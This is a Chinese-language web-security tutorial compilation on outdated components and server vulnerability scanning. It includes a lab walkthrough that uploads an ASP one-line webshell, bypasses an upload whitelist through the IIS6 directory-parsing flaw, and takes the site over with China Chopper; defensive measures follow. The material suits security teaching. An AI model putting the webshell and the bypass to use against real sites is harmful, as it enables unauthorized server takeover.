漏洞描述

使用了不再支持或者過時的組件。這包括：OS、Web伺服器、應用程序伺服器、資料庫管理系統（DBMS）、應用程序、API和所有的組件、運行環境和庫。

滲透測試

① 根據前期信息搜集的信息，查看相關組件的版本，看是否使用了不在支持或者過時的組件。一般來說，信息搜集，可通過http返回頭、相關錯誤信息、應用指紋、埠探測（Nmap）等手段搜集。

② Nmap等工具也可以用於獲取操作系統版本信息

③ 通過CVE，CNVD等平台可以獲取當前組件版本是否存在漏洞

風險評級：按照存在漏洞的組件的安全風險值判定當前風險。

安全建議

① 移除不使用的依賴、不需要的功能、組件、文件和文檔；

② 僅從官方渠道安全的獲取組件(盡量保證是最新版本)，並使用簽名機制來降低組件被篡改或加入惡意漏洞的風險；

③ 監控那些不再維護或者不發布安全補丁的庫和組件。如果不能打補丁，可以考慮部署虛擬補丁來監控、檢測或保護。
詳細學習可參考：

8. 目錄路徑檢測解析繞過上傳漏洞 什麼意思

上傳正常圖片和WEBShell

准備一張普通的圖片，使用*.jpg在電腦上進行搜索，可以看到很多圖片，復制一張圖片放到桌面上，改名為tupian.jpg。

打開上傳地址，選取上傳圖片。

小i提示：

上傳地址就是可以上傳文件的地方
本次實驗用的測試網址http://www.test.com作為目標網站

上傳成功後，觀察返回的頁面信息

小i提示:

觀察紅字部分（上傳是否成功，成功為 Upload Successful ，失敗這一行會顯示失敗信息）
觀察藍字部分（上傳成功後文件的路徑），它的名字是時間戳（通常是一個數字序列，唯一地標識某一刻的時間）加自己的尾綴

准備的是ASP環境,需要使用ASP的一句話，接著來製作一句話，新建一個空文本文檔，將ASP的一句話寫入到文本中,修改文件名為yijuhua.ASP並保存到桌面。

小i提示：

一句話是一種常見的網站後門，短小精悍,而且功能強大，隱蔽性非常好，在滲透測試過程中始終扮演著強大的作用。
不同的環境需要選取與環境匹配的一句話，一句話中<%eval request[『這里是密碼』]%>，本例中我們以
1 為密碼。

上傳ASP文件，發現提示錯誤信息：White List Match Failed--asp ,可能伺服器端禁止了尾綴asp的文件上傳。

2

利用IIS6解析缺陷繞過上傳檢測

首先打開BurpLoader，選擇 Proxy->Options ，設置BurpLoader代理地址，默認為127.0.0.1、埠：8080。

接著修改Firefox的代理設置，修改代理地址以及埠（設置與在BurpLoader中設置的代理地址相同：127.0.0.1、埠：8080）。

小i提示：

不同瀏覽器設置代理的方法不相同， 但是設置位置基本類似，此處我們以火狐瀏覽器為例，首先點擊右上角的工具->選項->網路->設置->手動配置代理，填入BurpLoader中設置的代理地址。

設置好瀏覽器代理後，我們再打開BurpLoader抓包，暫時截獲瀏覽器給伺服器發送的數據包，Proxy->Intercept 點擊
intercept off 改為intercept on，截獲的數據包將在關閉抓包的時候發送給服務端。

查看數據包：其中Content-Disposition:form-data;name=」path」下面的一行為服務保存文件的相對路徑，我們把原本的
uploading/ 改為 uploadimg/1.asp;。

小i知識點:

本例用了IIS6.0目錄路徑檢測解析，文件的名字為「*.asp/xxx.jpg」，也同樣會被 IIS 當作 ASP文件來解析並執行
首先我們請求 /aaa.asp/xxxx.jpg
從頭部查找查找 "."號,獲得 .asp/xxxx.jpg
查找"/",如果有則內存截斷，所以/aaa.asp/xxxx.jpg會當做/aaa.asp進行解析

修改完成後，關閉抓包（點擊intercept on ->intercept off），上傳數據,查看瀏覽器發現上傳成功，復制File Name後面的信息（例如：1.asp;14127900008.asp ）；在前面添加上uploadimg/粘貼復制到網站地址後面，從而構造訪問地址（例如：http://www.test.com/uploadimg/1.asp;14127900008.asp
），並復制訪問地址。

3

獲取WEBShell許可權

打開中國菜刀軟體並填入復制的訪問地址，填入你設定的密碼,之前我們在「一句話」中設置的密碼是1，選擇腳本類型為ASP，單擊添加按鈕，就會看到菜刀上出現一行信息，最後我們雙擊這條信息後，就可以看到目標網站的目錄，這樣我們就成功獲取到目標網站的WEBShell許可權。

小i 知識點：

中國菜刀，是一款專業的網站管理軟體，用途廣泛，使用方便，小巧實用。只要支持動態腳本的網站，都可以用中國菜刀與一句話協作來進行管理

這里可以看見我們剛剛上傳的文件，其中有一個空文件夾1.asp;以及其它我們上傳的文件。

4

防禦方案

1.客戶端檢測，使用JS對上傳圖片檢測，包括文件大小、文件擴展名、文件類型等

2.服務端檢測，對文件大小、文件路徑、文件擴展名、文件類型、文件內容檢測，對文件重命名

3.其他限制，伺服器端上傳目錄設置不可執行許可權

9. 如何檢測網站伺服器的漏洞

查找Web伺服器漏洞

在Web伺服器等非定製產品中查找漏洞時，使用一款自動化掃描工具是一個不錯的起點。與Web應用程序這些定製產品不同，幾乎所有的Web伺服器都使用第三方軟體，並且有無數用戶已經以相同的方式安裝和配置了這些軟體。

在這種情況下，使用自動化掃描器發送大量專門設計的請求並監控表示已知漏洞的簽名，就可以迅速、高效地確定最明顯的漏洞。Nessus 是一款優良的免費漏洞掃描器，還有各種商業掃描器可供使用，如 Typhon 與 ISS。

除使用掃描工具外，滲透測試員還應始終對所攻擊的軟體進行深入研究。同時，瀏覽Security Focus、郵件列表Bugtrap和Full Disclosure等資源，在目標軟體上查找所有最近發現的、尚未修復的漏洞信息。

還要注意，一些Web應用程序產品中內置了一個開源Web伺服器，如Apache或Jetty。因為管理員把伺服器看作他們所安裝的應用程序，而不是他們負責的基礎架構的一部分，所以這些捆綁伺服器的安全更新也應用得相對較為緩慢。而且，在這種情況下，標準的服務標題也已被修改。因此，對所針對的軟體進行手動測試與研究，可以非常有效地確定自動化掃描工具無法發現的漏洞。